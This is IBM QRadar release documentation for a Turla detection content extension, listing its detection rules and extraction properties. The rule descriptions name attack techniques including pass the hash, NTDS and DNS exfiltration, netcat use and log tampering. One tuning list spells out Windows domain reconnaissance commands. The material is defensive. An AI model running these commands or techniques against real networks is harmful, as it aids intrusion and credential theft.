Turla

Use the IBM Security QRadar Techniques for Turla Content Extension to closely monitor your deployment for Turla malware.

Important: To avoid content errors in this content extension, keep the associated DSMs up to date. DSMs are updated as a part of the automatic updates. If automatic updates are not enabled, download the most recent version of the associated DSMs from IBM® Fix Central (https://www.ibm.com/support/fixcentral).

IBM Security QRadar Techniques for Turla Content Extension

IBM Security QRadar Techniques for Turla Content Extension 1.0.4

The following table shows the rules that have been updated in IBM Security QRadar Techniques for Turla Content Extension 1.0.4.

Table 1. Custom Properties updated in IBM Security QRadar Techniques for Turla Content Extension 1.0.4
Name Optimized Description
Key Length Yes This property type is changed from alphanumeric to numeric.

IBM Security QRadar Techniques for Turla Content Extension 1.0.3

The following table shows the rules that have been updated in IBM Security QRadar Techniques for Turla Content Extension 1.0.3.

Table 2. Rules and Building Blocks in IBM Security QRadar Techniques for Turla Content Extension 1.0.3
Type Name Description
Rule Pass the Hash Activity Detects the attack technique pass the hash that is used to move laterally inside the network.

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Pass the Hash Activity in Network Logons Detects the attack technique pass the hash that is used to move laterally inside the network.

Used under Detection Rule License 1.1.

IBM Security QRadar Techniques for Turla Content Extension 1.0.2

The following table shows the rules that have been updated in IBM Security QRadar Techniques for Turla Content Extension 1.0.2.

Table 3. Rules and Building Blocks in IBM Security QRadar Techniques for Turla Content Extension 1.0.2
Type Name Description
Rule DNS Exfiltration Tools Execution Detects DNS exfiltration tool execution. Based on the DNS Exfiltration and Tunneling Tools Execution Sigma rule by Daniil Yugoslavskiy, and oscd.community.

Used under Detection Rule License 1.1.

Rule UAC Remote Restrictions Disabled Detects registry modification that allows remote administrative actions. Based on the Disable UAC Remote Restriction Sigma rule by Steven Dick, Teoderick Contreras, and Splunk.

Used under Detection Rule License 1.1.

Rule Suspicious Subprocess from RazerInstaller Detects suspicious subprocess from RazerInstaller.exe. Based on the Suspicious RazerInstaller Explorer Subprocess Sigma rule by Florian Roth, and Maxime Thiebaut.

Used under Detection Rule License 1.1.

IBM Security QRadar Techniques for Turla Content Extension 1.0.1

The following table shows the custom properties that are updated in IBM Security QRadar Techniques for Turla Content Extension 1.0.1.

Table 4. Custom Properties updated in IBM Security QRadar Techniques for Turla Content Extension 1.0.1
Name Optimized Description
Command Property Definition Yes This property is a placeholder for default custom extraction of Command Property from DSM payloads.
Parent Process Path Property Definition Yes This property is a placeholder for default custom extraction of Parent Process Path from DSM payloads.

The following table shows the rules and building blocks that are updated in IBM Security QRadar Techniques for Turla Content Extension 1.0.1.

Table 5. Rules and Building Blocks in IBM Security QRadar Techniques for Turla Content Extension 1.0.1
Type Name Description
Rule Communication to EquationGroup C2 Tools Detects communications to C2 servers. Based on the Equation Group C2 Communication Sigma rule by Florian Roth.

Used under Detection Rule License 1.1.

Rule Command Executed via SettingContent-ms Detects command that is executed through SettingContent-ms. Based on the Arbitrary Shell Command Execution through Settingcontent-Ms Sigma rule by Sreeman.

Used under Detection Rule License 1.1.

Rule DNS Exfiltration Tools Execution Detects DNS exfiltration tool execution. Based on the DNS Exfiltration and Tunneling Tools Execution Sigma rule by Daniil Yugoslavskiy, and oscd.community.

Used under Detection Rule License 1.1.

Rule UAC Remote Restrictions Disabled Detects registry modification that allows remote administrative actions. Based on the Disable UAC Remote Restriction Sigma rule by Steven Dick, Teoderick Contreras, and Splunk.

Used under Detection Rule License 1.1.

Rule Shadow Copies Creation Using Operating Systems Utilities Detects possible scenarios of credential access where shadow copies are created by using operating systems utilities. Based on the Shadow Copies Creation Using Operating Systems Utilities Sigma rule by Teymur Kheirkhabarov, Daniil Yugoslavskiy, and oscd.community.

Used under Detection Rule License 1.1.

Rule Shells Spawned by Web Servers Detects web servers that spawn shell processes that might be the result of a successfully placed web shell or another attack. Based on the Shells Spawned by Web Servers Sigma rule by Thomas Patzke, Florian Roth (Nextron Systems), Zach Stanford @svch0st, Tim Shelton, and Nasreddine Bencherchali (Nextron Systems).

Used under Detection Rule License 1.1.

Rule Active Directory Group/Computer Enumeration Triggers when a group or a computer is counted within Active Directory. Based on the Active Directory Group Enumeration With Get-AdGroup and Active Directory Computers Enumeration with Get-AdComputer Sigma rules by frack113.

Used under Detection Rule License 1.1.

Rule Get-ADUser User Discovery and Export Triggers when usage of the Get-ADUser cmdlet to collect user information and output it to a file. Based on the User Discovery And Export Via Get-ADUser Cmdlet - PowerShell Sigma rule by Nasreddine Bencherchali (Nextron Systems).

Used under Detection Rule License 1.1.

IBM Security QRadar Techniques for Turla Content Extension 1.0.0

The following table shows the custom properties that are in IBM Security QRadar Techniques for Turla Content Extension 1.0.0.

Table 6. Custom Properties in IBM Security QRadar Techniques for Turla Content Extension 1.0.0
Name Optimized Description
Access Mask Yes This property is a placeholder for default custom extraction of Access Mask from DSM payloads.
Accesses Yes This property is a placeholder for default custom extraction of Accesses from DSM payloads.
Account Name Yes This property is a placeholder for default custom extraction of Account Name from DSM payloads.
Account Security ID No This property is a placeholder for default custom extraction of Account Security ID from DSM payloads.
Audit ID Yes This property is a placeholder for default custom extraction of Audit ID from DSM payloads.
Authentication Package Yes This property is a placeholder for default custom extraction of Authentication Package from DSM payloads.
Call Trace Yes This property is a placeholder for default custom extraction of Call Trace from DSM payloads.
Call Type Yes This property is a placeholder for default custom extraction of Call Type from DSM payloads.
Command Yes This property is a placeholder for default custom extraction of Command from DSM payloads.
Command Arguments Yes This property is a placeholder for default custom extraction of Command Arguments from DSM payloads.
Consumer Destination Yes This property is a placeholder for default custom extraction of Consumer Destination from DSM payloads.
Description No This property is a placeholder for default custom extraction of Description from DSM payloads.
Destination Hostname Yes This property is a placeholder for default custom extraction of Destination Hostname from DSM payloads.
Error Code Yes This property is a placeholder for default custom extraction of Error Code from DSM payloads.
Extended Error Code Yes This property is a placeholder for default custom extraction of Extended Error Code from DSM payloads.
File Directory Yes This property is a placeholder for default custom extraction of File Directory from DSM payloads.
File Extension Yes This property is a placeholder for default custom extraction of File Extension from DSM payloads.
File Path Yes This property is a placeholder for default custom extraction of File Path from DSM payloads.
Filename Yes This property is a placeholder for default custom extraction of Filename from DSM payloads.
Granted Access Yes This property is a placeholder for default custom extraction of Granted Access from DSM payloads.
Group Name Yes This property is a placeholder for default custom extraction of Group Name from DSM payloads.
Impersonation Level Yes This property is a placeholder for default custom extraction of Impersonation Level from DSM payloads.
Initiated Yes This property is a placeholder for default custom extraction of Initiated from DSM payloads.
Initiator Username Yes This property is a placeholder for default custom extraction of Initiator Username from DSM payloads.
Integrity Level Yes This property is a placeholder for default custom extraction of Integrity Level from DSM payloads.
Logon Process Yes This property is a placeholder for default custom extraction of Logon Process from DSM payloads.
Logon Type Yes This property is a placeholder for default custom extraction of Logon Type from DSM payloads.
Machine Identifier Yes This property is a placeholder for default custom extraction of Machine Identifier from DSM payloads.
MD5 Hash Yes This property is a placeholder for default custom extraction of MD5 Hash from DSM payloads.
Parent Command Yes This property is a placeholder for default custom extraction of Parent Command from DSM payloads.
Parent Process Name Yes This property is a placeholder for default custom extraction of Parent Process Name from DSM payloads.
Parent Process Path Yes This property is a placeholder for default custom extraction of Parent Process Path from DSM payloads.
Pipe Name Yes This property is a placeholder for default custom extraction of Pipe Name from DSM payloads.
Process Name Yes This property is a placeholder for default custom extraction of Process Name from DSM payloads.
Process Path Yes This property is a placeholder for default custom extraction of Process Path from DSM payloads.
Properties Yes This property is a placeholder for default custom extraction of Properties from DSM payloads.
Registry Key Yes This property is a placeholder for default custom extraction of Registry Key from DSM payloads.
Registry Value Data Yes This property is a placeholder for default custom extraction of Registry Value Data from DSM payloads.
Relative Target Name No This property is a placeholder for default custom extraction of Relative Target Name from DSM payloads.
Service Filename Yes This property is a placeholder for default custom extraction of Service Filename from DSM payloads.
Service Name Yes This property is a placeholder for default custom extraction of Service Name from DSM payloads.
SHA256 Hash Yes This property is a placeholder for default custom extraction of SHA256 Hash from DSM payloads.
Share Name Yes This property is a placeholder for default custom extraction of Share Name from DSM payloads.
Start Function Yes This property is a placeholder for default custom extraction of Start Function from DSM payloads.
Start Module Yes This property is a placeholder for default custom extraction of Start Module from DSM payloads.
Subject Account Name Yes This property is a placeholder for default custom extraction of Subject Account Name from DSM payloads.
Target Account Security ID No This property is a placeholder for default custom extraction of Target Account Security ID from DSM payloads.
Target Details Yes This property is a placeholder for default custom extraction of Target Details from DSM payloads.
Target File Directory Yes This property is a placeholder for default custom extraction of Target File Directory from DSM payloads.
Target Object Yes This property is a placeholder for default custom extraction of Target Object from DSM payloads.
Target Process Name No This property is a placeholder for default custom extraction of Target Process Name from DSM payloads.
Target Process Path No This property is a placeholder for default custom extraction of Target Process Path from DSM payloads.
Target Username Yes This property is a placeholder for default custom extraction of Target Username from DSM payloads.
Type No This property is a placeholder for default custom extraction of Type from DSM payloads.
URL Host Yes This property is a placeholder for default custom extraction of URL Host from DSM payloads.

The following table shows the rules and building blocks that are in IBM Security QRadar Techniques for Turla Content Extension 1.0.0.

Table 7. Rules and Building Blocks in IBM Security QRadar Techniques for Turla Content Extension 1.0.0
Type Name Description
Building Block BB:BehaviorDefinition: Abuse of Findstr Detects abuse of findstr for evasion. Adversaries can use findstr to hide their artifacts or search specific strings and evade defense mechanism. Based on the Abusing Findstr for Defense Evasion Sigma rule by Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative, and Nasreddine Bencherchali.

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Abuse of Print Executable Detects the use of print.exe for remote file copy. Based on the Abusing Print Executable Sigma rule by Furkan CALISKAN, @caliskanfurkan_, and @oscd_initiative.

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Account Tampering - Suspicious Failed Logon Reasons Detects uncommon error codes on failed login attempts to determine suspicious activity and tampering with accounts that have been disabled or somehow restricted.
Building Block BB:BehaviorDefinition: Application Whitelisting Bypass via Bginfo Detects execution of VBscript code that is referenced within the *.bgi file. Based on the Application Whitelisting Bypass via Bginfo Sigma rule by Beyu Denis, and oscd.community.

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Arbitrary Command Execution Using WSL Detects Possible usage of Windows Subsystem for Linux® (WSL) binary as a LOLBIN to execute arbitrary Linux and Windows commands. Based on the Arbitrary Command Execution Using WSL Sigma rule by oscd.community, Zach Stanford @svch0st, and Nasreddine Bencherchali (Nextron Systems).

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Atbroker Registry Change Detects creation or modification of Assistive Technology applications and persistence with usage of 'at'. Based on the Atbroker Registry Change Sigma rule by Mateusz Wydra, and oscd.community.

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Atlassian Confluence Spawning Detects spawning of suspicious child processes by Atlassian Confluence server which might indicate successful exploitation. Based on the Atlassian Confluence CVE-2021-26084 Sigma rule by Bhabesh Raj.

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Automated Collection Command PowerShell Detects an adversary using automated techniques for collecting internal data. Based on the Automated Collection Command PowerShell Sigma rule by frack113.

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Automated Collection Command Prompt Detects an adversary using automated techniques for collecting internal data. Based on the Automated Collection Command Prompt Sigma rule by frack113.

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: BPFtrace Unsafe Option Usage Detects the usage of the unsafe bpftrace option. Based on the BPFtrace Unsafe Option Usage Sigma rule by Andreas Hunkeler (@Karneades).

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: C2 Session over ICMP Detects C2 session over ICMP.
Building Block BB:BehaviorDefinition: Carbon Filenames Detects when a Carbon filename is discovered. First set of names is from Carbon 3.7x, while second set of names is from Carbon 3.8x.
Building Block BB:BehaviorDefinition: Carbon Service Name Detects when a Carbon service is installed.
Building Block BB:BehaviorDefinition: Clearing Windows Console History Identifies when a user attempts to clear console history. An adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion. Based on the Clearing Windows Console History Sigma rule by Austin Songer @austinsonger.

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: ComRAT Registry Installation Detects when a ComRAT service is installed and a payload is written into the registry. This might indicate an existing access such as compromised credentials or a previously installed backdoor.
Building Block BB:BehaviorDefinition: ComRAT Scheduled Task Creation Detects when new scheduled task creations. ComRAT utilizes scheduled task to execute commands.
Building Block BB:BehaviorDefinition: Common Reconnaissance Commands Detects common reconnaissance commands adversaries execute to gather information about the victim.

The rule may be tuned by the Process CommandLine field. Some common Process CommandLine keywords that appear are:

  • gpresult /z
  • gpresult /v
  • gpresult
  • nbtstat -n
  • net view
  • net view /domain
  • netstat
  • netstat -nab
  • netstat -nao
  • nslookup 127.0.0.1
  • ipconfig /all
  • arp -a
  • net share
  • net use
  • systeminfo
  • net user
  • net user administrator
  • net user /domain
  • net group
  • net group /domain
  • net localgroup
  • net localgroup Administrators
  • net group 'Domain Computers' /domain
  • net group 'Domain Admins' /domain
  • net group 'Domain Controllers' /domain
  • dir '%programfiles%'
  • net group 'Exchange Servers' /domain
  • net accounts
  • net accounts /domain
  • net view 127.0.0.1 /all
  • net session
  • route
  • ipconfig /displaydns
Building Block BB:BehaviorDefinition: Creation of Cron Files Detects creation of cron file or files in Cron directories. Based on the Persistence Via Cron Files Sigma rule by Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), and MSTIC.

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Crutch File Staging Detects when a Crutch file staging under C:\AMD\Temp location.
Building Block BB:BehaviorDefinition: Crutch Filenames Detects when Crutch files under C:\Intel are discovered. Crunch files can include:
  • outllib.dll
  • finder.exe
  • resources.dll
  • outlook.dat
  • ihlp.exe
  • msget.exe
Building Block BB:BehaviorDefinition: Curl Start Combination and VBS Execute Arbitrary PowerShell Code Detects execution of arbitrary PowerShell code using SyncAppvPublishingServer.vbs. Adversaries can use curl to download payloads remotely and execute them. Based on the Curl Download And Execute Combination Sigma rule by Sreeman, and Nasreddine Bencherchali (Nextron Systems).

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: DLL Execution Via Register-cimprovider.exe Detects using register-cimprovider.exe to execute arbitrary DLL file. Based on the DLL Execution Via Register-cimprovider.exe Sigma rule by Ivan Dyachkov, Yulia Fomina, and oscd.community.

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: DLL Execution via Rasautou Detects using Rasautou.exe for loading arbitrary DLL specified in -d option and executes the export specified in -p. Based on the DLL Execution via Rasautou.exe Sigma rule by Julia Fomina, and oscd.community.

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Data Compressed - PowerShell Detects compressed data that is collected prior to exfiltration. Based on the Data Compressed - PowerShell Sigma rule by Timur Zinniatullin, and oscd.community.

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Delete Application Log Detects deletion of log files. Based on the TeamViewer Log File Deleted Sigma rule by frack113.

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Disable of ETW Trace Detects a command that clears or disables any ETW trace log which could indicate a logging evasion. Based on the Disable of ETW Trace Sigma rule by @neu5ron, Florian Roth (Nextron Systems), Jonhnathan Ribeiro, and oscd.community.

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Discovery Via Default Driver Altitude - Sysmon Detects usage of findstr with the argument 385201, which could indicate potential discovery of an installed Sysinternals Sysmon service using the default driver altitude. Based on the Suspicious Findstr 385201 Execution Sigma rule by frack113.

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Dotnet.exe Exec Dll and Execute Unsigned Code LOLBIN Detects dotnet.exe will execute any DLL and execute unsigned code. Based on the Dotnet.exe Exec Dll and Execute Unsigned Code LOLBIN Sigma rule by Beyu Denis, and oscd.community.

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Download Utilities in Events Detects when a download utility is being used on an Endpoint, such as ftp, sftp, curl, cuteftp, wget, certutil, bits, or nc.
Building Block BB:BehaviorDefinition: ETW Logging Tamper In .NET Processes Detects changes to environment variables related to ETW logging. Based on the ETW Logging Tamper In .NET Processes Sigma rule by Roberto Rodriguez (Cyb3rWard0g), and OTR (Open Threat Research).

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Epic Filenames Detects when Epic files are discovered.
Building Block BB:BehaviorDefinition: Epic Log Filenames Detects when Epic log files are discovered.
Building Block BB:BehaviorDefinition: Epic Search Terms Detects when Epic does a search on certain terms.
Building Block BB:BehaviorDefinition: Exchange Mailbox Export via PowerShell Detects the Exchange PowerShell New-MailBoxExportRequest cmdlet exporting the contents of a primary mailbox or archive to a .pst file. For more information about this attack, see Exporting Exchange Mailbox via PowerShell.
Building Block BB:BehaviorDefinition: Exchange PowerShell Snap-Ins Usage detects adding and using Exchange PowerShell snap-ins to export mailbox data. Based on the Exchange PowerShell Snap-Ins Usage Sigma rule by FPT.EagleEye, and Nasreddine Bencherchali (Nextron Systems).

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Execute Files with Msdeploy Detects file execution using the msdeploy.exe lolbin. Based on the Execute Files with Msdeploy.exe Sigma rule by Beyu Denis, and oscd.community.

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Execution DLL of Choice Using WAB Detects that the path to the DLL written in the registry is different from the default one. Launched WAB.exe tries to load the DLL from Registry. Based on the Execution DLL of Choice Using WAB.EXE Sigma rule by oscd.community, and Natalia Shornikova.

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Execution via Diskshadow Detects using Diskshadow.exe to execute arbitrary code in text file. Based on the Execution via Diskshadow.exe Sigma rule by Ivan Dyachkov, and oscd.community.

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Execution via WorkFolders Detects using WorkFolders.exe to execute an arbitrary control.exe. Based on the Execution via WorkFolders.exe Sigma rule by Maxime Thiebaut (@0xThiebaut).

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Execution via stordiag Detects the use of stordiag.exe to execute schtasks.exe, systeminfo.exe, and fltmc.exe. Based on the Execution via stordiag.exe Sigma rule by Austin Songer (@austinsonger).

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: File Download Using ProtocolHandler Detects usage of ProtocolHandler to download files. Downloaded files will be located in the cache folder. Based on the File Download Using ProtocolHandler.exe Sigma rule by frack113.

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: File and Directory Discovery - Linux Detects usage of system utilities to discover files and directories. Based on the File and Directory Discovery - Linux Sigma rule by Daniil Yugoslavskiy, and oscd.community.

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Fsutil Suspicious Invocation Detects suspicious parameters of fsutil, such as deleting USN journal, or configuring it with small size. Based on the Fsutil Suspicious Invocation Sigma rule by JEcco, E.M. Anhaus, and oscd.community.

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Gazer Filenames Detects when Gazer files are discovered.
Building Block BB:BehaviorDefinition: Gazer Registry Detects when Gazer registry names are discovered.
Building Block BB:BehaviorDefinition: Gazer Registry Values Detects when Gazer registry names are discovered.
Building Block BB:BehaviorDefinition: Hide Schedule Task Via Index Value Tamper Detects when the index value of a scheduled task is modified from the registry. Based on the Hide Schedule Task Via Index Value Tamper Sigma rule by Nasreddine Bencherchali.

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Hiding Files with Attrib.exe Detects usage of attrib.exe to hide files from users. Based on the Hiding Files with Attrib.exe Sigma rule by Sami Ruohonen.

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: HyperStack Filenames Detects when HyperStack files are discovered.
Building Block BB:BehaviorDefinition: HyperStack Pipe Detects when HyperStack pipe name is discovered.
Building Block BB:BehaviorDefinition: HyperStack Registry Detects when HyperStack registries are discovered.
Building Block BB:BehaviorDefinition: Invalid Password at Login Detects invalid password at login.
Building Block BB:BehaviorDefinition: Invalid Password during Kerberos Pre-Authentication Detects invalid password during Kerberos pre-authentication.
Building Block BB:BehaviorDefinition: Kazuar Registry Installation detects when a Kazuar service creates registry keys for persistence.
Building Block BB:BehaviorDefinition: Linux File Deletion detects file deletion using rm, shred or unlink commands. Adversaries may delete files using these commands to cover up their activities. Based on the File Deletion Sigma rule by Ömer Günal, and oscd.community.

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Logon Scripts with UserInitMprLogonScript Detects modification or creation of UserInitMprLogonScript. Based on the Logon Scripts (UserInitMprLogonScript) Sigma rule by Tom Ueltschi (@c_APT_ure), and Tim Shelton.

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Logon Scripts with UserInitMprLogonScript Registry Detects modification or creation of UserInitMprLogonScript.
Building Block BB:BehaviorDefinition: Lolbin PressAnyKey and Download Activity Detects a certain command line flag combination used by devinit.exe lolbin to download arbitrary MSI packages on a Windows system. Based on the NodejsTools PressAnyKey Lolbin Sigma rule by Florian Roth.

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: MSExchange Transport Agent Installation Detects the installation of a Transport Agent in Exchange. Based on the MSExchange Transport Agent Installation - Builtin Sigma rule by Tobias Michalski.

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: MSExchange Transport Agent Registration Detects modifications to the list of agents registered in Exchange.
Building Block BB:BehaviorDefinition: Malicious Files Written to the Fonts Folder Monitors for the hiding possible malicious files in the C:\Windows\Fonts\ location. This folder doesn't require admin privillege to be written and executed from. Based on the Writing Of Malicious Files To The Fonts Folder Sigma rule by Sreeman.

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Mavinject Inject DLL Into Running Process Detects process injection using the signed Windows Mavinject toll with the INJECTRUNNING flag. Based on the Mavinject Inject DLL Into Running Process Sigma rule by frack113, and Florian Roth.

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Microsoft Excel Template Creation Detects the creation of template files for Microsoft Excel from a process which is not Excel. Based on the Office Template Creation Sigma rule by Max Altgelt (Nextron Systems).

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Microsoft Word Template Creation Detects the creation of template files for Microsoft Word from a process which is not Word. Based on the Office Template Creation Sigma rule by Max Altgelt (Nextron Systems).

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Modification of Explorer Hidden Keys Detects modifications to the hidden files keys in registry. Based on the Modification of Explorer Hidden Keys Sigma rule by frack113.

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Mosquito Registry Installation Detects when a Mosquito service creates registry keys for persistence. The malware adds a shell value to HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\.
Building Block BB:BehaviorDefinition: Mosquito Registry Installation (2) Detects when a Mosquito service creates registry keys for persistence. The malware adds a local_update_check value to HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run.
Building Block BB:BehaviorDefinition: NTDS Exfiltration Command Detects a command used by conti to exfiltrate NTDS. Based on the Conti NTDS Exfiltration Command Sigma rule by Max Altgelt, and Tobias Michalski.

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Netcat Execution Detects suspicious netcat execution. Based on the Netcat Suspicious Execution Sigma rule by frack113, and Florian Roth.

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Netsh Port Forwarding Detects netsh commands that configure a port forwarding. Based on the New Port Forwarding Rule Added Via Netsh.EXX Sigma rule by Florian Roth (Nextron Systems), omkar72, oscd.community, and Swachchhanda Shrawan Poudel.

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Netsh RDP Port Forwarding Detects netsh commands that configure a port forwarding of port 3389 used for RDP. Based on the RDP Port Forwarding Rule Added Via Netsh.EXE Sigma rule by Florian Roth (Nextron Systems), and oscd.community.

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: New Service Creation Using PowerShell Detects the creation of a new service using Powershell. Based on the New Service Creation Using PowerShell Sigma rule by Timur Zinniatullin, Daniil Yugoslavskiy, and oscd.community.

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: New Service Creation Using Sc.EXE Detects the creation of a new service using the sc.exe utility. Based on the New Service Creation Using Sc.EXE Sigma rule by Timur Zinniatullin, Daniil Yugoslavskiy, and oscd.community.

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Pass the Hash Activity in Network Logons Detects the attack technique pass the hash which is used to move laterally inside the network. Based on the Pass the Hash Activity 2 Sigma rule by Dave Kennedy, Jeff Warren (method), and David Vassallo (rule).

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Pass the Hash Activity in NewCredentials Logons Detects the attack technique pass the hash which is used to move laterally inside the network. Based on the Pass the Hash Activity 2 Sigma rule by Dave Kennedy, Jeff Warren (method), and David Vassallo (rule).

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: PortProxy Registry Key Detects the modification of port proxy registry key which is used for port forwarding. Based on the PortProxy Registry Key Sigma rule by Andreas Hunkeler (@Karneades).

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Possible Linux Privilege Escalation Detects suspicious shell commands indicating the information gathering phase as preparation for the Privilege Escalation. Based on the Privilege Escalation Preparation Sigma rule by Patrick Bareiss.

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Possible Unauthorized MBR Modifications Detects possible malicious unauthorized usage of bcdedit.exe. Based on the Potential Ransomware or Unauthorized MBR Tampering Via Bcdedit.EXE Sigma rule by @neu5ron.

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Potential Equation Group Indicators Detects suspicious shell commands used in various Equation Group scripts and tools. Based on the Equation Group Indicators Sigma rule by Florian Roth.

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: PowerShell File Download Activity Detects when PowerShell is used to download files.
Building Block BB:BehaviorDefinition: Powercat Execution Detects powercat execution. Based on the Netcat The Powershell Version Sigma rule by frack113.

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Powershell File and Directory Discovery Finds or discovers files on the file system. Upon execution, file and folder information is displayed. Based on the Powershell File and Directory Discovery Sigma rule by frack113.

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Prefetch File Deletion Detects the deletion of a prefetch file. Based on the Prefetch File Deleted Sigma rule by Cedric MAURUGEON.

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Proxy Execution Via Explorer Detects the use of explorer.exe for evading defense mechanisms. Based on the Proxy Execution Via Explorer.exe Sigma rule by Furkan CALISKAN, @caliskanfurkan_, and @oscd_initiative.

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Regsvr32 Command Line Without DLL Detects a regsvr.exe execution that doesn't contain a DLL in the command line. Based on the Regsvr32 Command Line Without DLL Sigma rule by Florian Roth.

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Root Certificate Installed via CertMgr Detects adversaries installing a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. Based on the Root Certificate Installed Sigma rule by oscd.community, @redcanary, and Zach Stanford @svch0st.

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Root Certificate Installed via Certutil Detects adversaries installing a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. Based on the Root Certificate Installed Sigma rule by oscd.community, @redcanary, and Zach Stanford @svch0st.

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Runs COM Object via Verclsid Detects when verclsid.exe is used to run COM object via GUID. Based on the Verclsid.exe Runs COM Object Sigma rule by Victor Sergeev, and oscd.community.

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Scheduled Cron Task Detects the use of cron utility to create a scheduled job.
Building Block BB:BehaviorDefinition: Scheduled Cron Task/Job - Linux Detects the use of cron utility to create a scheduled job. Based on the Scheduled Cron Task/Job - Linux Sigma rule by Alejandro Ortuno, and oscd.community.

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Scheduled Task Write to System32 Tasks Detects the creation of tasks from processes executed from suspicious locations. Based on the Suspicious Scheduled Task Write to System32 Tasks Sigma rule by Florian Roth.

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Scheduled Task/Job - Windows Detects uncommon scheduled task. Based on the Uncommon Scheduled Task Once 00:00 Sigma rule by pH-T.

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Script Interpreter Execution From Suspicious Folder Detects a suspicious script executions in temporary folders or folders accessible by environment variables. Based on the Script Interpreter Execution From Suspicious Folder Sigma rule by Florian Roth.

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Security Software Discovery - Linux Detects usage of system utilities to discover security software discovery. Based on the Security Software Discovery - Linux Sigma rule by Daniil Yugoslavskiy, and oscd.community.

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Security Software Discovery - Powershell Detects PowerShell security software discovery. Based on the Security Software Discovery by Powershell Sigma rule by frack113.

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Set Windows System File with Attrib Detects files are marked as a system file using the attrib.exe utility. Based on the Set Files as System Files Using Attrib.EXE Sigma rule by frack113.

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Specified Binary Execution via Devtoolslauncher or OpenWith Detects when OpenWith.exe or Devtoolslauncher.exe executes other binary. Based on the OpenWith.exe Executes Specified Binary Sigma rule by Beyu Denis, oscd.community (rule), and @harr0ey (idea).

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Squirrel Lolbin Detects Possible Squirrel Packages Manager as Lolbin. Based on the Squirrel Lolbin Sigma rule by Karneades / Markus Neis, Jonhnathan Ribeiro, and oscd.community.

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Startup Shortcut Created Detects when a service creates a shortcut under Windows startup folder.
